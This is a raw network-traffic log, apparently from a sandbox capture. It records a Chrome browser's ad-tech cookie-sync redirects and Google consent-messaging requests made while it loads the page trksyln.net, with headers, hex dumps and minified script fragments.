2024-10-31 18:19:34 UTC	426	IN	HTTP/1.1 302 Found Timing-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Location: https://googleads.g.doubleclick.net/pagead/drt/si?st=NO_DATA Cache-Control: private Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Thu, 31 Oct 2024 18:19:34 GMT Server: cafe Content-Length: 0 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49870	8.2.111.136	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	774	OUT	GET /sync?id=10&google_gid=CAESELZvmPR7DxJls1q5vUVneqI&google_cver=1&google_push=AXcoOmTOEF9Y8fogjEB4TqPOvFToDFSNcqrrOe7PA0KGyHSr7lsEvHJLWXoidRqi6SOq-7TG1-HqyFGdK2rWPeFjmNw3z3TgjDyQdg HTTP/1.1 Host: sync2-dsp.e-volution.ai Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	410	IN	HTTP/1.1 302 Found Set-Cookie: production=42792e3cde3b100032f83ab40466; HttpOnly; SameSite=None; Secure; Expires=Wed Jan 29 2025 18:19:34 GMT+0000 (Coordinated Universal Time); Max-Age=7776000; path=/; domain=.e-volution.ai; Location: https://cm.g.doubleclick.net/pixel?google_nid=309242622&google_hm=42792e3cde3b100032f83ab40466 Date: Thu, 31 Oct 2024 18:19:34 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49846	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	845	OUT	POST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive Content-Length: 158 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	158	OUT	Data Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 32 35 31 32 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 5b 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d Data Ascii: [null,null,null,null,null,null,null,null,1730398772512,null,null,[null,[1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
2024-10-31 18:19:34 UTC	1861	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=utf-8 Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Origin: https://trksyln.net Access-Control-Allow-Credentials: true Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:34 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-pbmt4W0PWKCiR3fq0jdSaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmII0JBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4ubYNqV_J5vAgq8rSpRckvIL45Pz80pS80p0E1OKdUHsosyk0pL8IhR2ahlIRU5-enpmXnq8kYGRiaGBsYGegXF8gQEAC2oodg" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49845	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	845	OUT	POST /el/AGSKWxVBBzvZ69xO4jG5wX53WFu8HNxIHAgKipnIrao5nJty4CejpOan7tW1s_7eFn4m2MgODKcxGKt7pGBCu4j4FSjhBLIWfJJLo5rj0s2f3HlOOJoHwb6I-HPmer1qRPiMUaABDqvU5g== HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive Content-Length: 155 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain Accept: / Origin: https://trksyln.net X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	155	OUT	Data Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 33 30 33 39 38 37 37 32 35 33 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 32 2c 31 5d 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d Data Ascii: [null,null,null,null,null,null,null,null,1730398772531,null,null,[[2,1]],null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
2024-10-31 18:19:34 UTC	1861	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=utf-8 Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Origin: https://trksyln.net Access-Control-Allow-Credentials: true Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:34 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-q4eeqtZLwA88oN-SM0A74w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmII0JBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4ubYNqV_J5vAg20rSpRckvIL45Pz80pS80p0E1OKdUHsosyk0pL8IhR2ahlIRU5-enpmXnq8kYGRiaGBsYGegXF8gQEAC_Modw" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49854	107.21.226.44	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	875	OUT	GET /d/sync/cookie/generic?https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=${ADELPHIC_CUID_B64} HTTP/1.1 Host: sync.ipredictive.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	643	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Date: Thu, 31 Oct 2024 18:19:34 GMT Location: https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=kkabdqbbSw6jVFe-wq1F4Q== Set-Cookie: cu=92469b76-a6db-4b0e-a354-57bec2ad45e1\|1730398774191; Path=/; Domain=ipredictive.com; Expires=Fri, 31 Oct 2025 18:19:34 GMT; Max-Age=31536000; SameSite=None; Secure X-CI-RTID: 969213ab-f4ca-438a-8f73-04fadc857cc5 Content-Length: 303 Connection: Close
2024-10-31 18:19:34 UTC	303	IN	Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6d 2e 67 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 2f 70 69 78 65 6c 3f 67 6f 6f 67 6c 65 5f 6e 69 64 3d 61 64 65 6c 70 68 69 63 5f 6d 6f 62 69 6c 65 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 67 69 64 3d 43 41 45 53 45 46 64 69 31 2d 52 69 50 66 57 4f 49 32 43 4c 52 7a 62 4f 47 68 38 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 63 76 65 72 3d 31 26 61 6d 70 3b 67 6f 6f 67 6c 65 5f 70 75 73 68 3d 41 58 63 6f 4f 6d 52 73 2d 2d 4e 58 5f 61 6d 7a 51 6f 46 66 61 56 4e 67 35 51 6f 69 69 47 30 50 62 4b 52 55 69 48 32 78 6c 4a 6b 49 50 4f 68 61 59 42 5a 6a 77 55 39 56 4f 2d 54 5a 71 6c 2d 46 44 72 46 6c 6e 6f 5a 38 4d 37 35 43 4b 38 5a 51 39 6b 46 47 43 5a 50 35 4f 58 31 62 6f 4c 65 30 66 62 4d 58 41 51 26 61 6d 70 3b Data Ascii: <a href="https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49858	174.137.133.49	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	773	OUT	GET /sync?exchange=11&google_gid=CAESEEsdtE4SKtYWVNPeVuWOY-c&google_cver=1&google_push=AXcoOmSt6_labGwG7eZ_989UtFK9wsaMAzKlKq1YttCVRXJ4tJ7NNPhWGVLSYuXx1V87z2xqKNZZQWX1Dv1IKIrsa3-8sxKvqRw_lA HTTP/1.1 Host: dsp.adkernel.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	537	IN	HTTP/1.1 302 Found Server: nginx Date: Thu, 31 Oct 2024 18:19:34 GMT Content-Length: 0 Connection: close Set-Cookie: ADK_EX_11=1; Max-Age=1209600; Domain=.adkernel.com; Path=/; Secure; SameSite=None Set-Cookie: ADKUID=A8836978867793438466; Max-Age=2592000; Domain=.adkernel.com; Path=/; Secure; SameSite=None Location: https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTg4MzY5Nzg4Njc3OTM0Mzg0NjY&google_push=AXcoOmSt6_labGwG7eZ_989UtFK9wsaMAzKlKq1YttCVRXJ4tJ7NNPhWGVLSYuXx1V87z2xqKNZZQWX1Dv1IKIrsa3-8sxKvqRw_lA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49860	20.157.217.118	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	771	OUT	GET /api/adx/cm/pixel?google_gid=CAESEPW3MUN8tvNLNoJsiPIpkO8&google_cver=1&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1O HTTP/1.1 Host: www.temu.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	768	IN	HTTP/1.1 302 Server: nginx Date: Thu, 31 Oct 2024 18:19:34 GMT Content-Length: 0 Connection: close Location: https://cm.g.doubleclick.net/pixel?google_nid=whaleco_services_llc&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1O Content-Language: en-US x-gateway-request-id: 1730398774400-4f2eadd2afcb30b5c2e544288f26a4d3 strict-transport-security: max-age=31536000 content-security-policy-report-only: default-src 'none';script-src 'report-sample';report-uri /api/sec-csp/110000007/sec-gif yak-timeinfo: 1730398774400\|3 Set-Cookie: api_uid=Cm0sO2cjyjYzcABdrDD8Ag==; expires=Fri, 31-Oct-25 18:19:34 GMT; domain=.temu.com; path=/; secure cip: 173.254.250.77 Alt-Svc: h3=":443"; ma=604800

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49853	142.250.185.142	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	1083	OUT	GET /f/AGSKWxXE0rdt5cwklf9PRBqqi8rFncdilTmLVYbRCmgcYEIr_h6aXnlDVbYl8-Mw69k26WrMfK2ANMfR9tO7b_s5NhLr9ZNkM_vAqZxxWuutweCz4t4EvQ7RPeu7lVUr28c-H-5-bioZAg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzcyLDU3NDAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl1dXQ HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	1952	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Timing-Allow-Origin: * Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:34 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-wCOSEmvIvKGuG2nR7bqr1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjKtHikmLw1pBiUAjbyXTi1m2mC0As8fUlkxYQO6XPYA0B4tab51inA3HSv_OsJUDsrnWR1R-IDRUusToDsWPRJVZPIFbtucRqDsT3111ifQ7ERRJXWFuA-HbTFdbHQMzw9QorBxAL8XBsm9K_k03gxbXlzYxKGkn5hfHJ-XklRZlJpSX5RWnJaanFqUVlqUXxRgZGJoYGxgZ6BgbxBQYAbwFGFQ" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:34 UTC	1952	IN	Data Raw: 64 39 66 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 2e 72 75 6e 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 76 61 72 20 74 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 6e 6e 28 63 29 2c 66 2c 67 2c 68 3d Data Ascii: d9fif (typeof __googlefc.fcKernelManager.run === 'function') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs\|\|{};(function(_){var window=this;try{var tn=function(a,b,c,d){var e=nn(c),f,g,h=
2024-10-31 18:19:34 UTC	1542	IN	Data Raw: 2e 7a 28 63 2c 5f 2e 61 67 2c 32 29 26 26 28 63 3d 5f 2e 45 28 63 2c 5f 2e 61 67 2c 32 29 2c 5f 2e 4e 28 64 2c 33 2c 63 29 29 3b 5f 2e 4e 28 62 2c 32 2c 64 29 3b 61 2e 52 28 32 2c 5f 2e 4a 28 62 29 29 7d 7d 7d 3b 76 61 72 20 41 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 41 6e 2c 5f 2e 49 29 3b 76 61 72 20 42 6e 3d 5b 32 2c 33 5d 3b 76 61 72 20 7a 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 7a 6e 2c 5f 2e 49 29 3b 76 61 72 20 43 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 6c 3d 5f 2e 74 28 61 29 7d 3b 5f 2e 76 28 43 6e 2c 5f 2e 49 29 3b 76 61 72 20 44 6e 3d 5f 2e 75 28 43 6e 29 3b 76 61 72 20 45 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b Data Ascii: .z(c,_.ag,2)&&(c=_.E(c,_.ag,2),_.N(d,3,c));_.N(b,2,d);a.R(2,_.J(b))}}};var An=function(a){this.l=_.t(a)};_.v(An,_.I);var Bn=[2,3];var zn=function(a){this.l=_.t(a)};_.v(zn,_.I);var Cn=function(a){this.l=_.t(a)};_.v(Cn,_.I);var Dn=_.u(Cn);var En=function(){
2024-10-31 18:19:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49864	174.137.133.49	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	771	OUT	GET /sync?exchange=11&google_gid=CAESEDdTD-hSLjZJhPlP3FuVp9M&google_cver=1&google_push=AXcoOmSt1m7rF-4iFBqUxfNrh9kLkm2l2-27NM6ylpVM1BbGfx988rXg5S47kzFlUujGYJTCJlkITmT_GbciUFrM5Au3IbUbXt8y HTTP/1.1 Host: dsp.adkernel.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:34 UTC	535	IN	HTTP/1.1 302 Found Server: nginx Date: Thu, 31 Oct 2024 18:19:34 GMT Content-Length: 0 Connection: close Set-Cookie: ADK_EX_11=1; Max-Age=1209600; Domain=.adkernel.com; Path=/; Secure; SameSite=None Set-Cookie: ADKUID=A1746760580361003486; Max-Age=2592000; Domain=.adkernel.com; Path=/; Secure; SameSite=None Location: https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTE3NDY3NjA1ODAzNjEwMDM0ODY&google_push=AXcoOmSt1m7rF-4iFBqUxfNrh9kLkm2l2-27NM6ylpVM1BbGfx988rXg5S47kzFlUujGYJTCJlkITmT_GbciUFrM5Au3IbUbXt8y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49859	208.93.169.131	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:34 UTC	784	OUT	GET /bh/rtset?pid=559960&gp=1&google_gid=CAESEC6PH-lvJoYH9V_-6nwhMus&google_cver=1&google_push=AXcoOmQHW3Senmpk8tpcaDaCAkasoYHxB1QL3vzrRn4MuUN_wlYAkuh8f5ngrgzRfD_4zBEpSvzZMxzLE6FJ02A6qXPBh-8n3s0ad4A9 HTTP/1.1 Host: bh.contextweb.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pagead2.googlesyndication.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
